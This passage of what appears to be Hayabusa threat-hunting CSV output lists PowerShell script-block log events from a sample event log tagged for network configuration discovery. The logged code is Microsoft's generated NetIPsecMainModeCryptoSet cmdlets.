Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { [object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('MaxMinutes') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxMinutes}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeMinutes', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MaxSessions') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MaxSessions}) $__cmdletization_queryBuilder.FilterByProperty('MaxLifetimeSessions', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('ForceDiffieHellman') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForceDiffieHellman}) $__cmdletization_queryBuilder.FilterByProperty('ForceDiffieHellman', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeRule') -and (@('ByAssociatedNetIPsecMainModeRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeRule}, 'MSFT_NetMainModeRuleMMCryptoSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecMainModeRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecMainModeCryptoSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewDisplayName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${Description}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxMinutes}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [uint32] ${MaxSessions}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [bool] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByDisplayGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByDisplayGroup', 'ByGroup', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewDisplayName')) { [object]$__cmdletization_value = ${NewDisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxMinutes')) { [object]$__cmdletization_value = ${MaxMinutes} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeMinutes'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('MaxSessions')) { [object]$__cmdletization_value = ${MaxSessions} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'MaxLifetimeSessions'; ParameterType = 'System.UInt32'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('ForceDiffieHellman')) { [object]$__cmdletization_value = ${ForceDiffieHellman} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ForceDiffieHellman'; ParameterType = 'System.Boolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:06.004 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecMainModeCryptoSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxMinutes}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${MaxSessions}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${ForceDiffieHellman}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { 